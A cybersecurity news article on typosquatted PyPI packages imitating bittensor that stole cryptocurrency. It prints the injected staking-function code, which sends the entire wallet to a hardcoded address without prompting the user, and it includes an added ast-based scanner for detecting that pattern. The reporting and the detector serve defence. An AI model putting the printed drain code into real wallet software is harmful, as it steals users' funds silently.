Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets

A sophisticated cryptocurrency theft campaign has emerged targeting the Bittensor ecosystem through malicious Python packages distributed via the Python Package Index (PyPI).

The attack leverages typosquatting techniques to deceive developers and users into installing compromised versions of legitimate Bittensor packages, ultimately resulting in complete wallet drainage during routine staking operations.

The malicious campaign was orchestrated with precision, with all five typosquatted packages published within a concentrated 25-minute window on August 6, 2025.

These packages included variations such as “bitensor” (missing ‘t’), “bittenso” (truncated), and “qbittensor” (prefixed), all designed to mimic the authentic bittensor and bittensor-cli packages.

The attackers strategically chose version numbers 9.9.4 and 9.9.5 to closely match legitimate package versions, maximizing the likelihood of accidental installation through developer typos or copy-paste errors.

GitLab analysts identified the threat through their automated package monitoring system, which flagged suspicious activity related to popular Bittensor packages.

The discovery revealed a carefully engineered attack that exploits the trust inherent in routine blockchain operations, specifically targeting users engaged in staking activities who typically possess substantial cryptocurrency holdings.

Analysis of the Hijacked Staking Mechanism

The attack’s technical sophistication lies in its surgical modification of legitimate staking functionality within the stake_extrinsic function located in bittensor_cli/src/commands/stake/add.py.

At line 275, the attackers inserted malicious code that completely subverts the expected staking process:

result = await transfer_extrinsic(
    subtensor=subtensor,
    wallet=wallet,
    destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
    amount=amount,
    transfer_all=True,
    prompt=False
)

This code injection operates with devastating efficiency by setting transfer_all=True to drain entire wallets rather than just the intended staking amount, while prompt=False bypasses user confirmation dialogs.

The hardcoded destination wallet address serves as a collection point for stolen funds, which are subsequently distributed through a multi-hop laundering network involving several intermediary wallets before reaching the final consolidation address.
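For defenders reviewing an installed copy of the package, the sketch below is an added example, not code from the article or from GitLab's tooling. It parses Python source with the ast module and flags any transfer_extrinsic call whose keyword arguments match the pattern described above: a string-literal destination, transfer_all=True, or prompt=False. The function and keyword names come from the snippet above; the helper names, the sample sources and the placeholder address are constructed, and treating literal values as suspicious is a heuristic assumption.

```python
import ast

# Constructed sample of a tampered staking function; the address is a placeholder.
SAMPLE_TAMPERED = '''
async def stake_extrinsic(subtensor, wallet, amount):
    result = await transfer_extrinsic(
        subtensor=subtensor, wallet=wallet,
        destination="5EXAMPLEPLACEHOLDERADDRESS",
        amount=amount, transfer_all=True, prompt=False,
    )
    return result
'''

# Constructed sample of an ordinary call whose arguments come from the caller.
SAMPLE_CLEAN = '''
async def send(subtensor, wallet, dest, amount, prompt):
    return await transfer_extrinsic(
        subtensor=subtensor, wallet=wallet, destination=dest,
        amount=amount, transfer_all=False, prompt=prompt,
    )
'''

def _call_name(func):
    """Name of the called function for foo(...) and module.foo(...) forms."""
    if isinstance(func, ast.Name):
        return func.id
    return func.attr if isinstance(func, ast.Attribute) else None

def find_suspicious_transfers(source, filename="<source>"):
    """Return (filename, line, reasons) for each risky transfer_extrinsic call."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call) or _call_name(node.func) != "transfer_extrinsic":
            continue
        # Keep only keyword arguments whose value is a literal in the source.
        consts = {kw.arg: kw.value.value for kw in node.keywords
                  if kw.arg and isinstance(kw.value, ast.Constant)}
        reasons = []
        if isinstance(consts.get("destination"), str):
            reasons.append("hardcoded destination")
        if consts.get("transfer_all") is True:
            reasons.append("transfer_all=True")
        if consts.get("prompt") is False:
            reasons.append("prompt=False")
        if reasons:
            findings.append((filename, node.lineno, reasons))
    return findings
```

To audit an environment, read each .py file under the installed package directory and pass its text and path to find_suspicious_transfers; any finding inside a staking command warrants manual review.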

The post Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets appeared first on Cyber Security News.
